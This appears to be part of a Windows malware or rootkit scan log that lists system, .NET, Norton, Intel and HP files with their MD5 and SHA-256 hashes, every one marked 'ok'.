12:17:21.0982 0x1aa8 C:\Windows\System32\linkinfo.dll - ok
12:17:21.0986 0x1aa8 [ 405F4D32D2185F1F1BD753D8EEAFFB3A, CAC42C3E09C43BE96592B670D70821386014DB22D8239A9CFB9E33E54FB5C3D5 ] C:\Windows\System32\networkexplorer.dll
12:17:21.0987 0x1aa8 C:\Windows\System32\networkexplorer.dll - ok
12:17:21.0991 0x1aa8 [ 5F639198C4137075DA50E61C23963C11, 3D03B3BF62B3469069AD6BE2AAEE152CB6722D36C001B8197FEBC2F3EB9ADBE0 ] C:\Windows\System32\drprov.dll
12:17:21.0991 0x1aa8 C:\Windows\System32\drprov.dll - ok
12:17:21.0995 0x1aa8 [ BC566D17914B07ABAAB3A5A385CC3300, DCE0A1D26312AA6441FB7122C6EED980AE350D58B2B4B166CB62F983306268E9 ] C:\Windows\System32\ntlanman.dll
12:17:21.0995 0x1aa8 C:\Windows\System32\ntlanman.dll - ok
12:17:21.0999 0x1aa8 [ B32AB94A432289AC2DF77A3DCAD32EED, B1021C78F940E6FA7A8992B2733B593B89DA57325A0A0D13D2767F193A78D90F ] C:\Windows\System32\davclnt.dll
12:17:21.0999 0x1aa8 C:\Windows\System32\davclnt.dll - ok
12:17:22.0003 0x1aa8 [ 45B24A357C801CE62052FE0CDC8BD4D2, 00602E41B78473825253F6B2557A5C43FBDDCCF713D806929AE7C039FF8F185C ] C:\Windows\System32\davhlpr.dll
12:17:22.0004 0x1aa8 C:\Windows\System32\davhlpr.dll - ok
12:17:22.0008 0x1aa8 [ 1D89B7C00D6CAEA48CF64617D6CEB899, 3B3645B7A1870021CBA71E5DEFD643E02762FAD3294A107F9F2733B320B3C443 ] C:\Program Files\Common Files\Microsoft Shared\OFFICE14\msoshext.dll
12:17:22.0008 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\msoshext.dll - ok
12:17:22.0013 0x1aa8 [ 508AA6CBC9FE2C25D0D382D98DBEC044, 211CEE647BCAA0B25E9E7F8A5004B33AA919DE106B1453B81E1A0FBB1889D513 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\asengine.dll
12:17:22.0013 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\asengine.dll - ok
12:17:22.0017 0x1aa8 [ 65B1173C65DA9590CD4229C9148CDBBE, 14836FC83C8877061E949E2F29F3A14AEFC10F26101854C699334F62D70878A6 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avmail.dll
12:17:22.0018 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avmail.dll - ok
12:17:22.0022 0x1aa8 [ 81F08948A0F1475894C99D4D19A158A8, 93334DA369BF976E498265E432CAF63D898D378C6B32947DF355366ABE2A0FAC ] C:\Windows\SysWOW64\wshqos.dll
12:17:22.0022 0x1aa8 C:\Windows\SysWOW64\wshqos.dll - ok
12:17:22.0026 0x1aa8 [ 0D893F8D145D3B125B0226727C243A69, B344A18C5D5324A891B6E2121EC375AFB9E83D4C59D64EDD2E63854ABEC5D734 ] C:\Windows\System32\security.dll
12:17:22.0026 0x1aa8 C:\Windows\System32\security.dll - ok
12:17:22.0030 0x1aa8 [ 012787CEB35505EB78DF82E0A0072888, FE082EF9F8462589F8C8BEEFB1D10AB06E1E3D6F4494CABF34097328C109C03E ] C:\Windows\System32\browcli.dll
12:17:22.0030 0x1aa8 C:\Windows\System32\browcli.dll - ok
12:17:22.0034 0x1aa8 [ C4BFE4B61086416B0529212F92BCE081, A5EE6FB81229885C7A4A4EF0A9C3E9EE9E7F85C1EDE9BEEE236EB0503093D8F3 ] C:\Windows\System32\schedcli.dll
12:17:22.0034 0x1aa8 C:\Windows\System32\schedcli.dll - ok
12:17:22.0038 0x1aa8 [ 5EA9A0950F322BFA382AF277801C0307, A2C00A3E22A484A00620FF801E0B6EB475C9593C80AF321564E5A0DD2B1C38B7 ] C:\Windows\System32\wbem\wmipcima.dll
12:17:22.0038 0x1aa8 C:\Windows\System32\wbem\wmipcima.dll - ok
12:17:22.0044 0x1aa8 [ B24450E38722F69F338533A36ECFFC29, B1516252A211F0D402F402D1E10821503533F674568F1A57BC6DA0DC507A3F5A ] C:\Windows\System32\RacEngn.dll
12:17:22.0044 0x1aa8 C:\Windows\System32\RacEngn.dll - ok
12:17:22.0051 0x1aa8 [ AA61A7047E854A9E914FDD17C2F35675, F07AC1271BDB6346540ADC685DE25EE16B9F5C6655C716573421413114B7E074 ] C:\Windows\System32\sqlceoledb30.dll
12:17:22.0051 0x1aa8 C:\Windows\System32\sqlceoledb30.dll - ok
12:17:22.0055 0x1aa8 [ 9C75CB8B98610F0CD85D99BB5876308B, 54F0449E8E44F5B47A6A087AFAC1A10CD19B6513D9846CB306EFFA576551AAE9 ] C:\Windows\System32\sqlcese30.dll
12:17:22.0055 0x1aa8 C:\Windows\System32\sqlcese30.dll - ok
12:17:22.0060 0x1aa8 [ E5744D18C88737C6356D0A8D6D49D512, 4FF86DDF0BDCE0E4D73114CD027621C8FD48591992C3424CF77B354BB252EB26 ] C:\Windows\System32\sqlceqp30.dll
12:17:22.0060 0x1aa8 C:\Windows\System32\sqlceqp30.dll - ok
12:17:22.0065 0x1aa8 [ 15E298B5EC5B89C5994A59863969D9FF, 8D38B2E023462D0804F72E907D11FF72CE84540EA3B8D83F411C602C3F6A1177 ] C:\Windows\SysWOW64\npmproxy.dll
12:17:22.0065 0x1aa8 C:\Windows\SysWOW64\npmproxy.dll - ok
12:17:22.0071 0x1aa8 [ B4815D6371E28050D0ECE998A4768990, DDE7773B14FB9B4C38C8C57EFD438E5ADFADB00057FF38726AEEF9AEA8074DE0 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\qbackup.dll
12:17:22.0071 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\qbackup.dll - ok
12:17:22.0077 0x1aa8 [ 999D26092644471FF0DFDAEF52B34DC7, E2883CABBAB673827EE590B2BD76DDF043C439B33D6A854C9DD878C49ADCFE71 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avscntsk.dll
12:17:22.0077 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avscntsk.dll - ok
12:17:22.0081 0x1aa8 [ 005247E3057BC5D5C3F8C6F886FFC10C, FCB27F89EC36856A4A225744CE5EE3A30CBC8A447868B165D95E8AB2C17F5671 ] C:\Windows\System32\wbem\WMIADAP.exe
12:17:22.0081 0x1aa8 C:\Windows\System32\wbem\WMIADAP.exe - ok
12:17:22.0087 0x1aa8 [ 9FE3ED67345F0FF829A4A53B90E09672, F70CD131DCF101B26CD55A57876DB3765B3E15C9D3A8B508FF041C91226EC504 ] C:\Windows\System32\loadperf.dll
12:17:22.0087 0x1aa8 C:\Windows\System32\loadperf.dll - ok
12:17:22.0092 0x1aa8 [ 9C0B511EB8E5E0C02113D3AB2CFD6BE0, 86A75FAD261135B38363474839D34F886632E78CF5178B64A2C3F23C36BAA802 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\imcfg.dll
12:17:22.0093 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\imcfg.dll - ok
12:17:22.0096 0x1aa8 [ 487F44B08EFEAF5AD087878357B9403D, B02C99850940588D52B3E6DB30DB64582F294E0BD62101067BECFEA1483010C6 ] C:\Windows\SysWOW64\pdh.dll
12:17:22.0096 0x1aa8 C:\Windows\SysWOW64\pdh.dll - ok
12:17:22.0100 0x1aa8 [ BE5C7690D94F9DAB63BEED73D8FFABBE, 1144CDEDEEE42EF91B6F1E0A5CC086C3B12708037A6F3CF13676F1D37219B03E ] C:\Windows\System32\wbem\WmiApRes.dll
12:17:22.0100 0x1aa8 C:\Windows\System32\wbem\WmiApRes.dll - ok
12:17:22.0103 0x1aa8 [ B92E9318F7E4AEF633B8EC3A873565AF, DA378AE1283B941B4251B7DD37FB21F37F7282750D94900D96EE413ADD316883 ] C:\Windows\SysWOW64\perfdisk.dll
12:17:22.0103 0x1aa8 C:\Windows\SysWOW64\perfdisk.dll - ok
12:17:22.0107 0x1aa8 [ 0AE2C218A9AB6C16D79160CCE55B35FC, 59739EE3BCAA001BCE8A53DC4B32CB11C4054D4E937445C2D1D2B4476ABC3A6B ] C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe
12:17:22.0107 0x1aa8 C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe - ok
12:17:22.0111 0x1aa8 [ 593AD9042E84A7BADB7E84C6A97D6494, 9D7B6868DFEA9D67C3FCDE1E10B6194161B40D2CBAB72EAFAE431A7CFE3BCECF ] C:\Windows\assembly\NativeImages_v2.0.50727_64\WindowsBase\860cfb90fd4dd4eccb26488e10e0f42e\WindowsBase.ni.dll
12:17:22.0111 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\WindowsBase\860cfb90fd4dd4eccb26488e10e0f42e\WindowsBase.ni.dll - ok
12:17:22.0115 0x1aa8 [ D9B9FA5132E0868911737E44536536EB, A32F1827DD93CA74CA13EBD0EE2A244448454598EFB7099A975AA7C5436D812B ] C:\Windows\assembly\NativeImages_v2.0.50727_64\PresentationCore\496c66c1ec949738d092aab42ea40325\PresentationCore.ni.dll
12:17:22.0115 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\PresentationCore\496c66c1ec949738d092aab42ea40325\PresentationCore.ni.dll - ok
12:17:22.0119 0x1aa8 [ C4F8E5684A636D4D16BE409FD5E5AF6F, 4D7C5236ADF622EDFC2A59B17442875248B6D3C4A079BE9CCAA1DF5E1754A427 ] C:\Windows\assembly\NativeImages_v2.0.50727_64\PresentationFramewo#\f11b76fe8e17836118d9589f35845091\PresentationFramework.ni.dll
12:17:22.0119 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\PresentationFramewo#\f11b76fe8e17836118d9589f35845091\PresentationFramework.ni.dll - ok
12:17:22.0123 0x1aa8 [ AE098D9D3BD83440C59A0C3386F4F5DD, 13CFA7323349A2746D7FE662A7FCFC678F4E7AA9E12B45C62328022E3272384F ] C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll
12:17:22.0123 0x1aa8 C:\Windows\assembly\GAC_64\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll - ok
12:17:22.0128 0x1aa8 [ 6E656C325A5519A3A9D951709958CF6F, 1DC1D4BDF42F40A381D569297FEFB79B53CBD87088BA61A9EEA5AE4526B6182E ] C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\wpfgfx_v0300.dll
12:17:22.0128 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\wpfgfx_v0300.dll - ok
12:17:22.0130 0x1aa8 [ D64D99EC088B54FFE8EE67A480386C20, A6D1E4CA40843B0B9B32019E69479457D46CA99A2804E937CDC385C9DEDFDE62 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
12:17:22.0130 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll - ok
12:17:22.0134 0x1aa8 [ 547BE09D331BBCF57F3AF5B4FC02C310, DF89E703C87E735BE80960CDCF003155D85F1BE765336DBD88CD387884788A5A ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\210e87c409d2f08e7503e9ab1e12db11\System.Xml.ni.dll
12:17:22.0134 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\210e87c409d2f08e7503e9ab1e12db11\System.Xml.ni.dll - ok
12:17:22.0138 0x1aa8 [ 8808B725F60DFE66E59620940A193CAF, 934220F406DFA61FF1CCB87546EA1FC016CF22C9839756F41493CE57360EAFCA ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Seri#\8653acb87b4a219a84e4ce58df35e62a\System.Runtime.Serialization.Formatters.Soap.ni.dll
12:17:22.0138 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Runtime.Seri#\8653acb87b4a219a84e4ce58df35e62a\System.Runtime.Serialization.Formatters.Soap.ni.dll - ok
12:17:22.0143 0x1aa8 [ A1C9D6E9B3C1056DA26CE3B51BAA2880, 585C4ADC259A69D57FCF976360028A022BA522B94D0E9C258FDFADFAD389452E ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Web\5b88c22b8154b03c5b0467f537572ac4\System.Web.ni.dll
12:17:22.0143 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Web\5b88c22b8154b03c5b0467f537572ac4\System.Web.ni.dll - ok
12:17:22.0147 0x1aa8 [ 5FBA7AA0224C5574845A2AFE28BAE4A3, 9B3EB74002B83F98AA578AE2C9625C6D7056B8D8B4C5DA838A0860ADE990B332 ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\bf76ec576453e56f4d41d99cbed88e5c\System.Management.ni.dll
12:17:22.0147 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\bf76ec576453e56f4d41d99cbed88e5c\System.Management.ni.dll - ok
12:17:22.0150 0x1aa8 [ 45375DF47ED4D0535739465105AAABE3, 593FB37CF24B7987143AEC2182D21D7CB08C09D70E1C57A9209184D57AF980C4 ] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
12:17:22.0151 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll - ok
12:17:22.0155 0x1aa8 [ B6CCB6129ABFC60421EAF2404431FA8F, E56043050EB12A2FED2BE438BF4AC4A77FD6E68003421C00B27A359D08B5A361 ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\02e876a42f8f4ae5d74c8f07819a4870\System.Core.ni.dll
12:17:22.0155 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\02e876a42f8f4ae5d74c8f07819a4870\System.Core.ni.dll - ok
12:17:22.0159 0x1aa8 [ A4B361D8D5A963B75B080CE25C114981, D35271DAE29B2381F04596F2692FEA4397105D54C8DA55029ABFFB48452944E1 ] C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml.Linq\58895d16e437b97040631a373ebf7e4f\System.Xml.Linq.ni.dll
12:17:22.0159 0x1aa8 C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml.Linq\58895d16e437b97040631a373ebf7e4f\System.Xml.Linq.ni.dll - ok
12:17:22.0163 0x1aa8 [ 01E2855FB06C422E721D890AF201C2D7, 9CAA197D5CE95AABFC8C09EA2137E73C7A0EF37CE0459508C663F7B2D758E57F ] C:\Windows\System32\NaturalLanguage6.dll
12:17:22.0163 0x1aa8 C:\Windows\System32\NaturalLanguage6.dll - ok
12:17:22.0166 0x1aa8 [ 701D9F5F3F21580936638D5C5F86B460, 2F187684F61C72AACF8274EA29B48DAAC6C8377F791843914AABF5DAB3760980 ] C:\Windows\System32\NlsData0009.dll
12:17:22.0166 0x1aa8 C:\Windows\System32\NlsData0009.dll - ok
12:17:22.0170 0x1aa8 [ 148A733B93A2AC104280495DA09D3CC2, 443E46865090C610B84A82DB23DF8D1F22001FEA8B10F5619A10D25D7FEA29CC ] C:\Windows\System32\NlsLexicons0009.dll
12:17:22.0170 0x1aa8 C:\Windows\System32\NlsLexicons0009.dll - ok
12:17:22.0173 0x1aa8 [ 76D86E65FF7D10292886A1F2DB93A911, D83CF27E338FEF4967CE0B1D28FE60CEF986D275781FC013531E54B328C4B9A3 ] C:\Windows\System32\ELSCore.dll
12:17:22.0173 0x1aa8 C:\Windows\System32\ELSCore.dll - ok
12:17:22.0177 0x1aa8 [ AEE087CF7423BA44CC2DE03CC565E399, 8C1C59D438C0C28E1B7B078C3EA030F6C4A7CBC3B1306D673B0A2EA0AAB2B953 ] C:\Windows\System32\elslad.dll
12:17:22.0177 0x1aa8 C:\Windows\System32\elslad.dll - ok
12:17:22.0181 0x1aa8 [ 12929BDE96189F4E968AD035573424F0, 27FBB49F6ED6722A0C43E270E7678EFE9950BD913760DB33D5C10AFAB99417FC ] C:\Windows\System32\elsTrans.dll
12:17:22.0181 0x1aa8 C:\Windows\System32\elsTrans.dll - ok
12:17:22.0184 0x1aa8 [ 11542EC1F1C53EDB3CCF5AADF4C9972F, 3458A80698836B5ECD1F5E61FA1525C4646DDA4CDAF11BE80E6F11425D8C3674 ] C:\Windows\System32\NlsData0000.dll
12:17:22.0184 0x1aa8 C:\Windows\System32\NlsData0000.dll - ok
12:17:22.0188 0x1aa8 [ 51272A935F4F482A70F2A7D1C3A67AEE, CDA0861FFFE918B74E7C30E6A54D9A8B51665ACC24185D30273F9782407B0C8E ] C:\Windows\System32\NlsData000c.dll
12:17:22.0188 0x1aa8 C:\Windows\System32\NlsData000c.dll - ok
12:17:22.0192 0x1aa8 [ C2142407A2BE3462247500849B3FF8C7, A2C1C5689591871215F1F485B2BB37C5EC2943EBA44501C2486CA4F2186C9C96 ] C:\Windows\System32\NlsLexicons000c.dll
12:17:22.0192 0x1aa8 C:\Windows\System32\NlsLexicons000c.dll - ok
12:17:22.0196 0x1aa8 [ 2B0605ABC47532155FFBFDC1693317D8, BC28CF86D3A1854C712DBC2DCF5F89C171185E17755E59C0551432CD0EE537E6 ] C:\Windows\System32\NlsData0010.dll
12:17:22.0196 0x1aa8 C:\Windows\System32\NlsData0010.dll - ok
12:17:22.0199 0x1aa8 [ 362ACF8F7476637A5F76BE5953F4F258, FBA3E8698347840DCD3DBA70DB47858FFBE86B4CBAD57D0564806177DE58D324 ] C:\Windows\System32\NlsLexicons0010.dll
12:17:22.0199 0x1aa8 C:\Windows\System32\NlsLexicons0010.dll - ok
12:17:22.0203 0x1aa8 [ CDEBD55FFBDA3889AA2A8CE52B9DC097, 61BD24487C389FC2B939CE000721677CC173BDE0EDCAFCCFF81069BBD9987BFD ] C:\Windows\System32\sdclt.exe
12:17:22.0203 0x1aa8 C:\Windows\System32\sdclt.exe - ok
12:17:22.0206 0x1aa8 [ 8CE1C165396F2453012B3E23ADD9DF76, 3716A374A44C73F3C961F5100B20D6531B8E83444C6245A4CDDF0B806E62F1B6 ] C:\Windows\System32\ReAgent.dll
12:17:22.0206 0x1aa8 C:\Windows\System32\ReAgent.dll - ok
12:17:22.0210 0x1aa8 [ B7AC66C1CCD87D7C49256B5451DED4FA, 2BA412A69605D75CF10B9446725917B850A29369BD3970CA14796CC24C9BFD72 ] C:\Windows\System32\spp.dll
12:17:22.0210 0x1aa8 C:\Windows\System32\spp.dll - ok
12:17:22.0214 0x1aa8 [ 11C405A2DCF38E098316FD904A4FB662, E544F5218102BC9557A75293461F8550A42471F1E77B7A64FB9CF53EB45CA3A4 ] C:\Windows\System32\sdengin2.dll
12:17:22.0214 0x1aa8 C:\Windows\System32\sdengin2.dll - ok
12:17:22.0217 0x1aa8 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] C:\Windows\System32\sdrsvc.dll
12:17:22.0217 0x1aa8 C:\Windows\System32\sdrsvc.dll - ok
12:17:22.0221 0x1aa8 [ E7FBBF3193E248EE05CBC9562810C44A, D894C492C63E20EC613D3D154FBD82DC5BC8C1A250DBDEA7DDA14BF407691968 ] C:\Windows\System32\sxshared.dll
12:17:22.0221 0x1aa8 C:\Windows\System32\sxshared.dll - ok
12:17:22.0225 0x1aa8 [ 55BA6C87FFB2C478E1C9351FA631CC1A, F773D20745034F3A2D0F9AE832BDFCD47F0DC9AE0E9AC3236407DB953EC4C12C ] C:\Windows\System32\sxproxy.dll
12:17:22.0225 0x1aa8 C:\Windows\System32\sxproxy.dll - ok
12:17:22.0229 0x1aa8 [ A59A7985F192198BF0EEED789BB5124C, FC6D13FAE902535E7655951B50DF4895AEFCD39C2474074AA07BFB22F397402E ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlmh.exe
12:17:22.0229 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltlmh.exe - ok
12:17:22.0233 0x1aa8 [ 17E6B6B2ADA2630E01EAE9F9AC7A1D63, 0FA5D37D8E80D836BAB9F0693FB98B53441364C3B9284D8C2F56BFDAA5B2BCD7 ] C:\Windows\System32\Mystify.scr
12:17:22.0233 0x1aa8 C:\Windows\System32\Mystify.scr - ok
12:17:22.0236 0x1aa8 [ 4C3DAEE652B005B483F16B8E9131C99D, 188DFF96F3B18A610C52775C8F95C99ABF27FF2E1D52B50EDF9F80FE337239CD ] C:\Windows\System32\d3d9.dll
12:17:22.0236 0x1aa8 C:\Windows\System32\d3d9.dll - ok
12:17:22.0239 0x1aa8 [ 3044D07ABDF4BBEA27E2EE7B1E0C0C65, D99A8C10CC4E5C778D063E56A131DB549F01CA7F9605F6596406606BB12C0269 ] C:\Windows\System32\d3d8thk.dll
12:17:22.0240 0x1aa8 C:\Windows\System32\d3d8thk.dll - ok
12:17:22.0243 0x1aa8 [ 162D247E995EAEBF3EF4289069E1111C, 19E858E9902E2D570FFD24AE2CB4165273F5BAB1FF7B04758B11AB5CD41FD752 ] C:\Windows\SysWOW64\devrtl.dll
12:17:22.0243 0x1aa8 C:\Windows\SysWOW64\devrtl.dll - ok
12:17:22.0247 0x1aa8 [ 5658368D62D43EAB5D5C1BAA654532DE, 703DF85E4518160C26BFD632691DC0035974F1255574ABA8874255665BECEFE1 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccscanw.dll
12:17:22.0247 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ccscanw.dll - ok
12:17:22.0251 0x1aa8 [ 80ECEA965F9BBDB5508F529EA5C739FE, 95AFD5A2B3D568B4CBBB0F5647EC53E640D65E7BBCE1BCF374D8A216DC081C48 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ecmldr32.dll
12:17:22.0251 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ecmldr32.dll - ok
12:17:22.0255 0x1aa8 [ 923684C0CB0AFBD9EDA4FD1D63125D3F, B01C5DB86998FB407E58B6F2ECB9DB3EC67525976E16E6D42BE069E83342C78D ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ECMSVR32.DLL
12:17:22.0255 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\ECMSVR32.DLL - ok
12:17:22.0258 0x1aa8 [ FB10715E4099AF9FA389C71873245226, 6A4CB43880B822A0C4714D6E52EB3EB2CE1E69C3AA9CA65EAAD6B131AE43F274 ] C:\Windows\System32\timedate.cpl
12:17:22.0259 0x1aa8 C:\Windows\System32\timedate.cpl - ok
12:17:22.0263 0x1aa8 [ E6F0F82788E8BD0F7A616350EFA0761C, 13091DCB3E3F4F52C3FF210E93AAF1DCE142CFC09F671AEAC5B922393B23E67B ] C:\Windows\System32\actxprxy.dll
12:17:22.0263 0x1aa8 C:\Windows\System32\actxprxy.dll - ok
12:17:22.0267 0x1aa8 [ 4050B6A101DEC9DCCD54232C532B4025, A4A6DFE38DD159035D28A0B0D792F038CA66385B6B15FE68C10268483AE146FF ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\NAVEX32A.DLL
12:17:22.0267 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140603.018\NAVEX32A.DLL - ok
12:17:22.0271 0x1aa8 [ 23B001185B7C3CB1F4BDEB143E6B45B7, AB3A5AB346F6353B43B06FBE20B7785DA988975E2C8B73A6588F107FFAAACC47 ] C:\Windows\System32\shdocvw.dll
12:17:22.0271 0x1aa8 C:\Windows\System32\shdocvw.dll - ok
12:17:22.0274 0x1aa8 [ 661CEEDE98A2E0E5CDD7DE239EB38353, 3F8A23FD9CC3516A9366235662942B942A64A4264F35BFFD339D1B054AD1080E ] C:\PROGRA~2\WIC4A1~1\MESSEN~1\msgslang.dll
12:17:22.0274 0x1aa8 C:\PROGRA~2\WIC4A1~1\MESSEN~1\msgslang.dll - ok
12:17:22.0277 0x1aa8 [ 2BCBA6052374959A30BD7948444DBB79, 46224A2B729026FEEBC3C6A09E69919D477097848DB2CA0C2F5B166CDF379660 ] C:\Windows\System32\gameux.dll
12:17:22.0277 0x1aa8 C:\Windows\System32\gameux.dll - ok
12:17:22.0281 0x1aa8 [ 1EAC1A8CA6874BF5B15E2EFB9A9A7B86, E15ED4FEFC3010C213694331DDFDC03767682325C898D773AB243E2DC8B08461 ] C:\Windows\System32\msftedit.dll
12:17:22.0282 0x1aa8 C:\Windows\System32\msftedit.dll - ok
12:17:22.0285 0x1aa8 [ E1DCEE9E3EC0522DF24397BE1A64E449, 840D91B6386BD9537D130AE1B6129186D0D97EABCC0CC254422496D28665017D ] C:\Windows\System32\dfshim.dll
12:17:22.0285 0x1aa8 C:\Windows\System32\dfshim.dll - ok
12:17:22.0288 0x1aa8 [ 4C2C4640BF23AAFCF90519E0F34436CE, 8ACCDA77C2DC5BE2DAED05134310122AFECC872A8D118612E55DD229BFE4D844 ] C:\Windows\System32\DeviceCenter.dll
12:17:22.0288 0x1aa8 C:\Windows\System32\DeviceCenter.dll - ok
12:17:22.0292 0x1aa8 [ 49EA56842D10998940E6DE2990DF3426, 4770263895F4B3EE1DF1C3C08AFC204E7CCDD39CA9484F73E63EB465B01DB5CA ] C:\Windows\System32\igfxtray.exe
12:17:22.0292 0x1aa8 C:\Windows\System32\igfxtray.exe - ok
12:17:22.0296 0x1aa8 [ 0DB0C404F39E8ACA64F9A655C6C7896C, 7393481A6F040BBE656667D4423F545DDADB7CCD21A97EA06643D88F06C4C013 ] C:\Windows\System32\hccutils.dll
12:17:22.0296 0x1aa8 C:\Windows\System32\hccutils.dll - ok
12:17:22.0300 0x1aa8 [ 15B7225BBA691E4CF8A3D06238D46AE6, D9D10F3B6FF960373ECA79EA06383E9CAAEED5986C706967BF0A7B0714DE4FF2 ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
12:17:22.0300 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll - ok
12:17:22.0304 0x1aa8 [ 99B56D7D1646FF0A45D03A2695F1C239, 95381B8CDEE56926DE3E7A22C75725287163BCB41944BA4F98357996D1C5DE9E ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfdll.dll
12:17:22.0304 0x1aa8 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfdll.dll - ok
12:17:22.0307 0x1aa8 [ 90574F7150DB2BDC22444BF7445C0A32, 1CD59A516F6E09F2A902D58B3120F7620BC1EC308F9510D75A75F65E30D42994 ] C:\Windows\System32\igfxsrvc.exe
12:17:22.0307 0x1aa8 C:\Windows\System32\igfxsrvc.exe - ok
12:17:22.0311 0x1aa8 [ 85C2A87B30EE63D88B0452ED8A13FDF1, FA7EBA5E0D6E2C47A86A6E8CEF6AF4649F94323C2DB5403F45E0F4F5D026BD69 ] C:\Windows\System32\igfxdev.dll
12:17:22.0311 0x1aa8 C:\Windows\System32\igfxdev.dll - ok
12:17:22.0315 0x1aa8 [ 722D953718E6E1C57A83D3CE03374A1E, 2F87E0EE9A883432086A1FB4ACDBEA6A60E1CDA0314E0A5CB47150FDFFCEC02F ] C:\Windows\System32\igfxsrvc.dll
12:17:22.0315 0x1aa8 C:\Windows\System32\igfxsrvc.dll - ok
12:17:22.0318 0x1aa8 [ 6C999E613833B9B800127572BAD39DB7, E954488595A26B67FA784FDE439C2C3EEBA2A37BAEF8A41E7DDFDF4C72800DDB ] C:\Windows\System32\hkcmd.exe
12:17:22.0318 0x1aa8 C:\Windows\System32\hkcmd.exe - ok
12:17:22.0322 0x1aa8 [ 04CB7C8FDC6D9640DD82A527208F72C4, 0F8A327B0234A29EAB1F03D9102A3DF7DB4515BF580163198C5A8C174C98DE4F ] C:\Windows\System32\UIAnimation.dll
12:17:22.0322 0x1aa8 C:\Windows\System32\UIAnimation.dll - ok
12:17:22.0325 0x1aa8 [ 24FD76CD0C1084639511B574AAD1BD4E, 676A65EB77997128E4D34EB91F8A33DAB756D54AEF2AA6ECEC7DCE1C366313E4 ] C:\Windows\System32\igfxpers.exe
12:17:22.0325 0x1aa8 C:\Windows\System32\igfxpers.exe - ok
12:17:22.0329 0x1aa8 [ 4076E418CD3EB0E09FFBCD828C35CE26, C39896CC2EF80FE0937A96585AE3A981A93A4139EA21609D2A94076C331ED3DC ] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
12:17:22.0329 0x1aa8 C:\Program Files\Synaptics\SynTP\SynTPEnh.exe - ok
12:17:22.0333 0x1aa8 [ 24F4B480F335A6C724AF352253C5D98B, 011413B236CAD7B78CE0A0EEC3E3085D48C7576A3205D025BA6EBFDF590538E4 ] C:\Windows\System32\thumbcache.dll
12:17:22.0333 0x1aa8 C:\Windows\System32\thumbcache.dll - ok
12:17:22.0337 0x1aa8 [ 8014D0704174BA3A2ACBD2558BB25F90, 497E240D6EB91C7D75CC2017807956BC3D191D1CAF8AD3C77D22919C755C3917 ] C:\Program Files\IDT\WDM\sttray64.exe
12:17:22.0337 0x1aa8 C:\Program Files\IDT\WDM\sttray64.exe - ok
12:17:22.0340 0x1aa8 [ 9C7B8B8C27F8E15BACBE91DC8E75B1CD, 200117BDDC8919A80B77AA257BB8C5FC73213AE2C69858C1FE4DAA3ECEE64D20 ] C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe
12:17:22.0340 0x1aa8 C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe - ok
